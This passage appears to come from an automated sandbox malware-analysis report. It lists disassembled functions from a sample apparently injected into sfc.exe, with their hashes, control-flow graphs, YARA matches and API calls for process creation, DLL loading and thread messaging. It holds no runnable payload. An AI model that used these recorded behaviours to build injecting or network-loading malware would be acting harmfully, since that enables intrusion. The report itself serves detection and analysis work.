                                                                                                                      • Opcode Fuzzy Hash: 8d811da62935c2993ee1ec1e6bbdf75acfc1c33a752b16a899c5e4d33003dc42
                                                                                                                      • Instruction Fuzzy Hash: 4A900221242845575945F15845045074006D7E5241795D112A2415950C8736D966D621
                                                                                                                      Function 031E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 8b360f638f7d3f4bfc409b4727a2cbb8a9255e79121d218f1008b006760fd79f
                                                                                                                      • Instruction ID: b05ad77bd5b5fe3a0522cda3652cbebfc08bae15d203ea997fffaf3086ca78a6
                                                                                                                      • Opcode Fuzzy Hash: 8b360f638f7d3f4bfc409b4727a2cbb8a9255e79121d218f1008b006760fd79f
                                                                                                                      • Instruction Fuzzy Hash: 1D90023120180817D511B15846047070009C7D5241F95D512A1425558D9766CA62A121
                                                                                                                      Function 031E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: f41d207fe14dfd15d7523fd9fb2df5535fe6e2abf9aa0b964ddaf08ff52d1a4e
                                                                                                                      • Instruction ID: 9f03b065b751f2ea9aac50bff544b08e4bfd7c52025c1b60e0bb186588a74288
                                                                                                                      • Opcode Fuzzy Hash: f41d207fe14dfd15d7523fd9fb2df5535fe6e2abf9aa0b964ddaf08ff52d1a4e
                                                                                                                      • Instruction Fuzzy Hash: 0C90023120188C07D510B158850474A0005C7D5301F59D511A5425658D87A5C9A17121
                                                                                                                      Function 031E2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 378c557030217c02018dcc5ac64ebf19adf00f9f9776a79d10f2fd10554279c3
                                                                                                                      • Instruction ID: 01d687d8909786fb816286d179567f7d86475669e4fa65f590dc21b9cc9f839f
                                                                                                                      • Opcode Fuzzy Hash: 378c557030217c02018dcc5ac64ebf19adf00f9f9776a79d10f2fd10554279c3
                                                                                                                      • Instruction Fuzzy Hash: BF90023120180C47D500B1584504B460005C7E5301F55D116A1125654D8725C9617521
                                                                                                                      Function 031E2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d93f9420aead6bb3db31aac5312c2caa84b82ee3565b469a8e4d6842051cc9af
                                                                                                                      • Instruction ID: d960bbe6798b84467706ecbd168e4fe432df55021cf3d7614a2792053924088a
                                                                                                                      • Opcode Fuzzy Hash: d93f9420aead6bb3db31aac5312c2caa84b82ee3565b469a8e4d6842051cc9af
                                                                                                                      • Instruction Fuzzy Hash: CF90023120180807D500B59855086460005C7E5301F55E111A6025555EC775C9A16131
                                                                                                                      Function 02AA238F Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 526 2aa238f-2aa239c 527 2aa239e-2aa23b3 526->527 528 2aa2376 526->528 529 2aa23db-2aa23ed 527->529 530 2aa23b5-2aa23bd 527->530 533 2aa23ef 529->533 531 2aa23c0-2aa23c3 530->531 532 2aa2407-2aa241b 530->532 536 2aa2353-2aa2361 531->536 537 2aa23c5 531->537 534 2aa241d-2aa2427 532->534 535 2aa23c6-2aa23da 532->535 533->532 538 2aa2429-2aa2440 534->538 539 2aa24a0-2aa24a2 534->539 535->529 540 2aa2363-2aa2375 536->540 541 2aa23e1-2aa23ed 536->541 537->535 549 2aa245a 538->549 550 2aa2442-2aa244d 538->550 542 2aa24ff-2aa2502 539->542 543 2aa24a4-2aa24ab 539->543 540->528 541->533 546 2aa254d-2aa2553 542->546 545 2aa24ad-2aa24c2 543->545 551 2aa2520-2aa2547 545->551 552 2aa24c4 545->552 547 2aa2583-2aa25da call 2a93e10 call 2a81410 call 2aa0c30 546->547 548 2aa2555-2aa2568 call 2aa9730 546->548 567 2aa25e0-2aa25f4 Sleep 547->567 559 2aa256e-2aa257f call 2aa9810 548->559 560 2aa266c-2aa2672 548->560 549->545 555 2aa245c-2aa2463 549->555 550->549 551->546 552->542 555->539 559->547 568 2aa2659-2aa2660 567->568 569 2aa25f6-2aa25fc 567->569 568->567 572 2aa2666 568->572 570 2aa25fe-2aa2624 call 2aa4850 569->570 571 2aa2626-2aa2646 569->571 574 2aa264c-2aa264f 570->574 571->574 575 2aa2647 call 2aa48f0 571->575 572->560 574->568 575->574
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: O?L/$net.dll$wininet.dll
                                                                                                                      • API String ID: 0-576308649
                                                                                                                      • Opcode ID: a8a5ff7d997ff086e41e6cdbee0f0eadb63e79087a04fe0a6fb27f23cfaa67c4
                                                                                                                      • Instruction ID: f4cef5870f8988a5aa7f66d1c5423698eb069185c1b0aceaf1e0190250d31c44
                                                                                                                      • Opcode Fuzzy Hash: a8a5ff7d997ff086e41e6cdbee0f0eadb63e79087a04fe0a6fb27f23cfaa67c4
                                                                                                                      • Instruction Fuzzy Hash: 005196B1A41701ABCB15CF34CCA1BE6BBA9FF45314F24469DEC588B281EB70A561CB91
                                                                                                                      Function 02A9041F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 577 2a9041f-2a90425 578 2a9045f-2a904ca call 2aa9860 call 2aaa270 call 2a93e10 call 2a81410 call 2aa0c30 577->578 579 2a90427-2a9042d 577->579 590 2a904ea-2a904f0 578->590 591 2a904cc-2a904db PostThreadMessageW 578->591 579->578 591->590 592 2a904dd-2a904e7 591->592 592->590
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 02A904D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: 6cb5c63604678ed013be2d7a969ddfc50513a42e798849a4c834d16f530c0797
                                                                                                                      • Instruction ID: 591717ee9cbd705ce2f7c031d162fa98efa90931c80f2a81de11c656afd988c0
                                                                                                                      • Opcode Fuzzy Hash: 6cb5c63604678ed013be2d7a969ddfc50513a42e798849a4c834d16f530c0797
                                                                                                                      • Instruction Fuzzy Hash: 8111A3B294025CBEEF12ABD19C90DEF7BBDEF81394F058064F614AB100DA345E16CBA1
                                                                                                                      Function 02A90459 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 593 2a90459-2a90472 594 2a9047a-2a904ca call 2aaa270 call 2a93e10 call 2a81410 call 2aa0c30 593->594 595 2a90475 call 2aa9860 593->595 604 2a904ea-2a904f0 594->604 605 2a904cc-2a904db PostThreadMessageW 594->605 595->594 605->604 606 2a904dd-2a904e7 605->606 606->604
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 02A904D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: f1318d8b1bff014d8375fd1b232d232ce3a1418c210069b2df722e664ea9f267
                                                                                                                      • Instruction ID: fa01698a4280541928fc63b03b5053ba682420e988a871ef7cf7fea6060916a6
                                                                                                                      • Opcode Fuzzy Hash: f1318d8b1bff014d8375fd1b232d232ce3a1418c210069b2df722e664ea9f267
                                                                                                                      • Instruction Fuzzy Hash: B501A1B2D4010CBAEF11ABE18C91DEFBBBDEF45394F058164FA04AB141DA355E168BA1
                                                                                                                      Function 02A90460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 607 2a90460-2a90472 608 2a9047a-2a904ca call 2aaa270 call 2a93e10 call 2a81410 call 2aa0c30 607->608 609 2a90475 call 2aa9860 607->609 618 2a904ea-2a904f0 608->618 619 2a904cc-2a904db PostThreadMessageW 608->619 609->608 619->618 620 2a904dd-2a904e7 619->620 620->618
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 02A904D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446
                                                                                                                      • Opcode ID: 7bc25cef7b4fec5ee93a0d6950db229c6397c4dacc09d0faeced583e2eb8bfc3
                                                                                                                      • Instruction ID: de820ba7e9cf9f57d3a5c8fbe9f472a13235b10f3118de4fd7cb7eabcc7f341e
                                                                                                                      • Opcode Fuzzy Hash: 7bc25cef7b4fec5ee93a0d6950db229c6397c4dacc09d0faeced583e2eb8bfc3
                                                                                                                      • Instruction Fuzzy Hash: 400184B2D4021CBAEF11AAE18C91DEFBBBDDF45794F058064FA04A7141DA745E068BA1
                                                                                                                      Function 02AA2520 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02AA25EB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: 1cf7e09954a324fef1f24bbf1a96cb8dc40ce5fb04ac278efa2c42ca2481e72c
                                                                                                                      • Instruction ID: ed07f75b8acdad21e9b50d6002e407e7d7d8a0e9a6688236479765bec6000f4a
                                                                                                                      • Opcode Fuzzy Hash: 1cf7e09954a324fef1f24bbf1a96cb8dc40ce5fb04ac278efa2c42ca2481e72c
                                                                                                                      • Instruction Fuzzy Hash: 623168B1A41704ABC714DF64CC94FE7BBA9AF88304F10852CE9595B240DB70BA548FA5
                                                                                                                      Function 02AA248A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02AA25EB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: d67687cccd87788831caaaed8a25e2b3849b24fdb9166769d272a1f9bb9b2327
                                                                                                                      • Instruction ID: 56d4a045bdd2d7369b8ab4704f516245d5065329618d6e27da7678b9d5212b4b
                                                                                                                      • Opcode Fuzzy Hash: d67687cccd87788831caaaed8a25e2b3849b24fdb9166769d272a1f9bb9b2327
                                                                                                                      • Instruction Fuzzy Hash: 9A3122B1A41B01ABC714AF78C9A4BE6BBB9FF48304F50861DE81D8B240EB71A555CF91
                                                                                                                      Function 02AA2511 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 97sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02AA25EB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: c876b4a344aab78a18243edb4989c1418d112aadd7aa0789f107c38c7dc092af
                                                                                                                      • Instruction ID: 7dce203f00df1efd72482d46fc2d3f84b95462201618635d36f6d53f31514aa3
                                                                                                                      • Opcode Fuzzy Hash: c876b4a344aab78a18243edb4989c1418d112aadd7aa0789f107c38c7dc092af
                                                                                                                      • Instruction Fuzzy Hash: A3319AB1A41705AECB14DF64CC94FEBBBA9EF88304F108528E9196B240EB746954CFA5
                                                                                                                      Function 02A9E597 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 02A9E5B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                      • Opcode ID: 32446db891de931dee62cb0da15a62686ad060eba1b72568941aca3efa1385fc
                                                                                                                      • Instruction ID: 019dd8853ef50f047c674d008fc7dc56d147b1861162bc705c9d262364c208e5
                                                                                                                      • Opcode Fuzzy Hash: 32446db891de931dee62cb0da15a62686ad060eba1b72568941aca3efa1385fc
                                                                                                                      • Instruction Fuzzy Hash: 8E3132B5A0060ADFDF00DF99C8809EFB7B9BF88304F104559E515EB205DB75AE05CBA0
                                                                                                                      Function 02A9E5A0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 02A9E5B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                      • Opcode ID: cbb8f52dd71afa118bcc762c56b8d23f8b5c19c46d87910ea6997f6cc0cb8d2f
                                                                                                                      • Instruction ID: afb5661b57fe773281b54ce4dc0aad3df6202cf4bed390cbb4674cc7fcbddf3a
                                                                                                                      • Opcode Fuzzy Hash: cbb8f52dd71afa118bcc762c56b8d23f8b5c19c46d87910ea6997f6cc0cb8d2f
                                                                                                                      • Instruction Fuzzy Hash: 793121B5A0060A9FDF00DFD9D8809EFB7B9BF88304B108559E505EB215DB75EE05CBA0
                                                                                                                      Function 02A9B938 Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02A9B91F
                                                                                                                      • FindClose.KERNELBASE(?), ref: 02A9B92A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2066263336-0
                                                                                                                      • Opcode ID: 33cb0001b8213d76fbc71ca2a3cbfae648c569e3a95c5dfd399d2805056ffaa9
                                                                                                                      • Instruction ID: 33350231558e0e5403fe193861fb7ea00a1e9b75a72b80cf1629b0a70c5286e5
                                                                                                                      • Opcode Fuzzy Hash: 33cb0001b8213d76fbc71ca2a3cbfae648c569e3a95c5dfd399d2805056ffaa9
                                                                                                                      • Instruction Fuzzy Hash: 64E065B6A0015CABDB10DFA6EC84DFFB37CEB85715F004599F90495000DB319B408BB0
                                                                                                                      Function 02A93E10 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A93E82
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 42827f6d4e147cc66cda343915524e04a3ed7cc4cfed2bc2c8491ec10588e454
                                                                                                                      • Instruction ID: 8d545875f30e69c24106603b98fbc9759ff19c2c82198fc1a120dcca4e000375
                                                                                                                      • Opcode Fuzzy Hash: 42827f6d4e147cc66cda343915524e04a3ed7cc4cfed2bc2c8491ec10588e454
                                                                                                                      • Instruction Fuzzy Hash: E3010CB5D40209ABDF10DBE5DD81FAEB7B9AF54308F044195E90897241FA71E614CB91
                                                                                                                      Function 02AA7CE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A976D3,00000010,?,?,?,00000044,?,00000010,02A976D3,?,?,?), ref: 02AA7D43
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: c19b47aafdc30bd11bc3d6bb66b6cbe27a690397638dae3c5a73abd65ba38752
                                                                                                                      • Instruction ID: 3b2481ce5178343bc4fead34bd515a3ff7e3e9cbc9177c7078ddb7113d8f1b50
                                                                                                                      • Opcode Fuzzy Hash: c19b47aafdc30bd11bc3d6bb66b6cbe27a690397638dae3c5a73abd65ba38752
                                                                                                                      • Instruction Fuzzy Hash: EF0192B2204208BFCB44DE99DC90EDB77ADAF8C754F418608BA1DE3241DA30F8518BA4
                                                                                                                      Function 02A892B0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A892F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: 1bd79e81d0a19149a727e1cbdadcd0d680b513a083287e123bd97f4a464d67a2
                                                                                                                      • Instruction ID: b8e426143ff1f62d32d0dcfab70accb272215b661d26357939741c50ec67dc40
                                                                                                                      • Opcode Fuzzy Hash: 1bd79e81d0a19149a727e1cbdadcd0d680b513a083287e123bd97f4a464d67a2
                                                                                                                      • Instruction Fuzzy Hash: 80F039733902043AE32076A99D02FDBA69DCF80B65F240065F60CEB2C0DD92B4418AA5
                                                                                                                      Function 02A93EC1 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A93E82
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 3859159040f67455db16ba62f7af40b5874b346214392ea43279fb352a88c7b2
                                                                                                                      • Instruction ID: ce2195f52b539d7f80d6a2515087bf2bc852ff3e04be68fddd3cfbfa9e8f8296
                                                                                                                      • Opcode Fuzzy Hash: 3859159040f67455db16ba62f7af40b5874b346214392ea43279fb352a88c7b2
                                                                                                                      • Instruction Fuzzy Hash: D4F05475D00109BBEF10DBD4DC81FAEB3B89B04208F144194E90497240EA31EA04CF91
                                                                                                                      Function 02A892AB Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A892F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: 01d923287b915714fbd43d66e292aff6d7ffb7d2acd693ac1e80d6cbd6e1ca3b
                                                                                                                      • Instruction ID: d47655b109508431a8841c24b38bd9963c78e6db5b4672229f5147d47614009c
                                                                                                                      • Opcode Fuzzy Hash: 01d923287b915714fbd43d66e292aff6d7ffb7d2acd693ac1e80d6cbd6e1ca3b
                                                                                                                      • Instruction Fuzzy Hash: 76F06D7328030476E22072A98D02FD776DD8F90B91F200054FA09AB2C0DDA1B8418AE5
                                                                                                                      Function 02AA7C20 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(02A91079,?,02AA46DF,02A91079,02AA4037,02AA46DF,?,02A91079,02AA4037,00001000,?,?,02AA94B0), ref: 02AA7C59
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: f319cfc0ffa5fba61140cb43c6bd046cce7cec7d9a4d00fd9a17caaaa4b23255
                                                                                                                      • Instruction ID: 9769d2828e77f5ab6d04783670027e2f4ea42869015aedc080fe031bbcf0bcea
                                                                                                                      • Opcode Fuzzy Hash: f319cfc0ffa5fba61140cb43c6bd046cce7cec7d9a4d00fd9a17caaaa4b23255
                                                                                                                      • Instruction Fuzzy Hash: 83E09AB22002047FC614EE49DC41F9B37ADEFC8710F404408FA08A7241CB31BC118BB8
                                                                                                                      Function 02AA7C60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,02A936F3,000000F4,?,?,?,?,?), ref: 02AA7C99
